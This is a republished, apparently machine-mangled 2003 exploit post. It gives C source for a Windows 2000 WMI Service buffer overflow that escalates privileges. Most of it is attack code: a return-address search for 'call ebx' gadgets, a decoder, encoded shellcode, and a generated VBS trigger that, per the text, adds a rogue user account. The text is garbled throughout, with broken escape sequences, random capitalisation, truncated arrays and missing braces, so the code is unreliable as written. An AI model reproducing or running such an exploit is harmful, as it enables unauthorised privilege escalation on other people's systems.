[Example] Windows 2000 WMI Service Buffer Overflow Expolit

xiaoxiao2021-03-06  28

Windows 2000 WMI Service Buffer overflow Expolit

Create time: 2003-05-28

Article attribute: original

Article submission:

Eyas (EY4S_AT_21CN.COM)

Windows 2000 WMI Service Buffer overflow Expolit




WMI defaults only ADMINISTRATORS can be remotely connected, so only users who can run programs on the target system can be utilized.

Local users can use to improve permissions.

This procedure can be used in Simplified Chinese, Traditional Chinese, Japanese, Korean System SP0-3.

You don't need to specify any parameters, and the program automatically searches for available Call EBX addresses.

With C code to communicate with the WMI Service is too complicated, the program is generated two files, one is to store the Exploit Buffer

Buff.txt, one is XWMI.vbs.

/ * ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------- * /



#define nopcode 0x4f // 0x4f // 'o'

#define bufflen (65536 8) / 2

#define overpoint 0x260 // Overflow point -0x14 SEH-0X4

Int g_icodepage;

Char g_szdlllist [5] [16] = {"kernel32.dll",





Char * g_szwidecharshort;

Unsigned char jmpover [] = "/ x41 / x90 / x41 / x68"; // 0x41 inc ECX, 0x68 Push Num32

Unsigned char decoder [] =

"/ X4F / X75 / X05 / X74 / X03 / X4E / XC3 / X4F / X53 / X90 / X5E / X66 / XAD / X4E / X46 / X4F"

"/ x43 / x66 / x90 / x51 / x90 / x59 / x75 / xf0 / x53 / x56 / x5f / x4a / x57"

"/ x43 / x66 / x66 / x3d / x4f / x00 / x90 / x59 / x74 / xd9 / x4e / x2c / x64"

"/ x50 / x59 / x46 / x4f / x47 / x90 / x43 / x66 / xad / x50 / x4b / x58 / x2c / x64 / x4a / x57"

"/ X51 / X90 / X90 / X5F / X03 / XFF / X03 / XFF / X03 / XFF / X03 / XFF / X91 / X03 / XCF / X91"

"/ x90 / x5f / xaa / x90 / x41 / x74 / xca / x90 / x51 / x90 / x59 / x75 / xc4 / x4e / x97 / x6f"

Unsigned char xshellcode [] =


"Hrehggrqijikielogsdgsolosfggpmlgpedrsgnjkhdlimislgpkdhhirfrkimisirlopqlohjfhdgpg" "qeredgpeggpmjjlodllohjepdgpgperedfdgpelodddgpgrodfrogklosnlosflmdjlgpkdsikigssqd"





Int searchret ();

Bool MakewideCharlist ();


void main ()


Int retradr, i, j, ipathlen, iwlen

Unsigned char * pstr, widecharbuff [0x500], multibytebuff [0x500];

Unsigned char szvbs [0x1000], szpath [256], szpath2 [256];

File * f;

Printf ("XWMI -> Win2k WMI Service Buffer overflow Exploit / N"


"for Win2k Which Default CodePage IS GB, BIG5, KOREAN, JP SP0-3 / N"

"Written by EY4S / N"

"2003-04-27 / N"

"Thanks to Yuange / N / N");

MakewideCharlist ();

Retdr = searchret ();

IF (! Retaddr) Return;

PSTR = (unsigned char *) Malloc (40000);

MEMSET (PSTR, 0, 40000);

// Get Current Path

Ipathlen = GetCurrentDirectorya (SizeOf (Szpath) -1, Szpath);

IF (! ipathlen)


Printf ("GetCurrentDirectorya Failed:% D / N", getLastError ());



/ * Conversion character * /

MEMSET (WideCharbuff, 0, Sizeof (WideCharbuff));

// jmp over

Memcpy (WideCharbuff, Jmpover, 4);

// jmp addr

Memcpy (WideCharbuff 4, & Retaddr, 4);

// Decoder

Memcpy (WideCharbuff 8, Decoder, Sizeof (Decoder);

iwlen = wcslen ((unsigned short *) widecharbuff); i = widechartomultibyte (g_icodepage, 0, (unsigned short *) WidecharBuff,

iwlen * 2, Multibytebuff, 0x1000, 0, 0);

I = strlen (multibytebuff);

// Combination buffer


Memcpy (PSTR, SZPATH, IPathlen);

PSTR [ipathlen] = (byte) '//';

// jmpover & jmpaddr

Memcpy (PSTR Overpoint / 2, Multibytebuff, i);

// Real shellcode

Memcpy (PSTR Overpoint / 2 i, Xshellcode, Strlen (xshellcode);

f = fopen ("buff.txt", "w");

FPRINTF (f, "% s", pstr);

Fclose (f);

Free (PSTR);

Printf ("Write Exploit Buffer To File% S // Buff.txt / N", SZPATH);

// Replace '/' to '//'

MEMSET (Szpath2, 0, SIZEOF (SZPATH2));

For (i = 0, j = 0; i


IF (szpath [i] == (byte) '//')

Szpath2 [J ] = SZPATH [I];

Szpath2 [J] = SZPATH [I];


Sprintf (SZVBS, "SET FSO = CREATEOBJECT (/" scripting.filesystemobject / ") / n"

"SET F2 = fso.opentextfile (/" buff.txt / ", 1, false, tristatetrue) / n"

"szbuffer = f2.readall / n"

"f2.close / n"

"SET FSO = Nothing / N"

"Set Serviceset = getObject (/" WinMgmts: {ImpersonationLevel = Impersonate} / ") ._ / n"

"EXECQUERY (/" Select * from win32_directory where name = '% s' / ") / n"

"for Each Service In Serviceset / N"

"Wscript.echo /" if you can see "orthom" 台bess! / "/ N"

"Service.copy / n"

"next / n"


f = fopen ("xwmi.vbs", "w");

FPRINTF (f, "% s", szvbs);

Fclose (f);

Printf ("Create Exploit Execute File% S // XWMI.VBS / N", SZPATH);

Printf ("Execute Exploit File% S // Xwmi.vbs / N" "IF Success, Exploit Will Add A User XX Password IS 1A! .9nH / N", SZPATH);

CreateThread (0, 0, FUNC, NULL, 0, NULL);

Sleep (20000);

Deletefile ("buff.txt");

Deletefile ("xwmi.vbs");

Printf ("DONE./N");





System ("cscript.exe xwmi.vbs);

Return 0;


Bool MakewideCharlist ()


Int i, J, Ret;

Char szcodepage [128];

UNSIGNED Char WBuff [4];

UNSIGNED Char WBuff2 [4];

UNSIGNED Char Buff [4];

IF (! getLocaleInfo (locale_system_default, locale_idefaultcodepage,

SzcodePage, SizeOf (SzcodePage) -1)))


Printf ("GetLocaleInfo Failed:% D / N", getLastError ());

Return False;



Printf ("System Default CodePage IS% D / N", ICODEPAGE;

g_icodepage = iCODEPAGE;

g_szwidecharshort = (char *) Malloc (65536);

MEMSET (G_SzWidecharshort, 1, 65536);

For (i = 0; i <256; i )


For (j = 0; j <256; j ) // for 3


IF ((i == 0) && (j == 0)) j = 1;

MEMSET (BUFF, 0, 4);

MEMSET (WBUF1, 0, 4);

WBUFF [0] = (byte) i;

WBUFF [1] = (byte) j;

WBUFF [2] = (byte) '/ 0';

WBUFF [3] = (byte) '/ 0';

IF (! (Ret = Widechartomultibyte (icodepage, 0,

(unsigned short *) WBUFF, 1, BUFF, 2, 0, 0)))))


Printf ("WideChartomultibyte Error:% D / N", getLastError ());

Return False;


IF (! (RET = MultibytetowideChar (iCODEPAGE, 0, BUFF,

Strlen (BUFF), (Unsigned Short *) WBuff2, 1))))


Printf ("MultibyTowideChar Error:% D% D / N",

GetLastError (), RET);

Return False;


/ / Decision whether or not it is changed after twice

// As long as any Code Page change is considered illegal Wide Char range

IF (* (DWORD *) WBUFF! = * (DWORD *) WBUFF2)

g_szwidecharshort [(byte) WBUFF [0] * 0x100 (byte) WBUFF [1]] = (Byte) '/ 0';



Return True;


Int searchret ()


HModule H;

Bool bdone;


INT I, J, POS, INDEX1, INDEX2, K1, K2, K3, K4;

For (i = 0; i <5; i )


BDONE = false;

POS = 0;

H = loadingLibrary (g_szdlllist [i]);

IF (h == NULL)


Printf ("LoadLibrary% S Error:% D / N",

g_szdlllist [i], getLastError ());



PTR = (byte *) h;

Printf ("Start Search FFD3 IN% S / N", g_szdllist [i]);

For (j = 0; bdone; j )




// ff D3 -> Call EBX

// Do not contain the address of 00

IF (PTR [J] == (Byte) '/ XFF' && PTR [J 1] == (Byte) '/ xd3')


POS = (int) PTR J;

K1 = ((POS & 0x00FF0000) >> 8);

K2 = ((POS & 0xFF000000) >> 24);

K3 = ((POS & 0xFF) << 8);

K4 = ((POS >> 8) & 0xFF);

Index1 = k1 k2;

Index2 = k3 k4;

IF ((g_szwidecharshort [index1] == (byte) '/ x00') ||

(g_szwidecharshort [index2] == (byte) '/ x00') ||

(k1 == 0) ||

(k2 == 0) ||

(k3 == 0) ||

(k4 == 0))))

POS = 0;


} // end of try

__EXCEPT (Exception_execute_Handler)






IF (h)


Freelibrary (h);

h = null;




Printf ("Found Opcode AT 0x% .8x In% S / N", POS, G_SZDLLST [I]);




Return POS;



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